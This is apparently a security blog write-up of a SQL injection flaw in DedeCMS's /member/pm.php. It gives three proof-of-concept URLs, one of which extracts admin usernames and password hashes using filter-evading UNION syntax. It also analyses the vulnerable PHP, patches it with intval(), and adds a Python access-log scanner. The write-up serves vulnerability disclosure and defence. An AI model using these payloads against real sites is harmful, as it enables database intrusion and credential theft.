dedecms /member/pm.php SQL Injection Vul


Contents

1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Mitigation
6. Offense and defense thoughts


1. Vulnerability description

DedeCMS member center SQL injection vulnerability (/member/pm.php)

Relevant Link

http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html


2. Trigger conditions

0x1: POC1

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct+1,2,3,4,5,6,7,8,9,10,11,12%20%23

0x2: POC2

Use this variant if POC1 triggers the error: Safe Alert: Request Error step 1 !

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

0x3: POC3

Error-based injection

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Relevant Link

http://www.myhack58.com/Article/html/3/62/2014/42255.htm


3. Affected scope

4. Vulnerable code analysis

/member/pm.php

else if($dopost=='read')
{
    $sql = "SELECT * FROM `#@__member_friends` WHERE mid='{$cfg_ml->M_ID}' AND ftype!='-1' ORDER BY addtime DESC LIMIT 20";
    $friends = array();
    $dsql->SetQuery($sql);
    $dsql->Execute();
    while ($row = $dsql->GetArray())
    {
        $friends[] = $row;
    }
    // $id injection point: the raw request parameter is interpolated into the query
    $row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')"); // id is not filtered
    if(!is_array($row))
    {
        ShowMsg('對不起,你指定的訊息不存在或你沒許可權查看!','-1');
        exit();
    }
    // $id injection point
    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");
    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}

Relevant Link

http://0day5.com/archives/1313


5. Mitigation

/member/pm.php

else if($dopost=='read')
{
    $sql = "Select * From `#@__member_friends` where mid='{$cfg_ml->M_ID}' And ftype!='-1' order by addtime desc limit 20";
    $friends = array();
    $dsql->SetQuery($sql);
    $dsql->Execute();
    while ($row = $dsql->GetArray())
    {
        $friends[] = $row;
    }
    /* filter $id: force it to an integer before it reaches the query */
    $id = intval($id);
    /* */
    $row = $dsql->GetOne("Select * From `#@__member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");
    if(!is_array($row))
    {
        ShowMsg('對不起,你指定的訊息不存在或你沒許可權查看!','-1');
        exit();
    }
    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");
    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}
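The fix above casts the id with intval(), which keeps only the leading integer of whatever the client supplied. The following Python script, added here and not part of the original post or of DedeCMS, mirrors that check on the defender's side: it scans web-server access-log lines for pm.php?dopost=read requests whose id is not a plain integer and shows what intval() would have reduced each flagged value to. The log lines, IP addresses and the php_intval helper are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not from the original post);
# the payloads mirror the POCs discussed on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Feb/2014:10:00:01 +0800] "GET /dedecms5.5/member/pm.php?dopost=read&id=17 HTTP/1.1" 200 4120
10.0.0.7 - - [09/Feb/2014:10:00:02 +0800] "GET /dedecms5.5/member/pm.php?dopost=read&id=1%27+and+char(@%60%27%60)+and+1=2+UniOn+SelEct+1,2,3 HTTP/1.1" 200 512
10.0.0.9 - - [09/Feb/2014:10:00:03 +0800] "GET /dedecms5.5/member/pm.php?dopost=read&id=1%27+and+@%27+and+(select+count(*),concat(user(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)+and+%271%27=%271 HTTP/1.1" 500 233
10.0.0.11 - - [09/Feb/2014:10:00:04 +0800] "GET /dedecms5.5/member/index.php HTTP/1.1" 200 9001
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
INT_RE = re.compile(r"[+-]?\d+")

def php_intval(value):
    """Approximate PHP intval() on a string: optional whitespace and sign, then digits; else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0

def suspicious_id(line):
    """Return the decoded id of a /member/pm.php?dopost=read request whose id is not a
    plain integer (exactly what intval() would have discarded), or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/member/pm.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes and maps '+' to ' '
    if qs.get("dopost", [""])[0] != "read":
        return None
    raw_id = qs.get("id", [""])[0]
    return None if INT_RE.fullmatch(raw_id) else raw_id

def scan_log(text):
    """Return (client_ip, decoded_id, value_after_intval) for every flagged line."""
    hits = []
    for line in text.splitlines():
        raw_id = suspicious_id(line)
        if raw_id is not None:
            hits.append((LOG_RE.match(line).group("ip"), raw_id, php_intval(raw_id)))
    return hits

if __name__ == "__main__":
    for ip, raw_id, as_int in scan_log(SAMPLE_LOG):
        print(f"{ip}: id={raw_id!r} -> intval() would query id={as_int}")
```

intval() is a sufficient fix here only because id is numeric; for string parameters the equivalent protection is a parameterised query rather than a cast.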


6. Offense and defense thoughts

Copyright (c) 2015 LittleHann All rights reserved
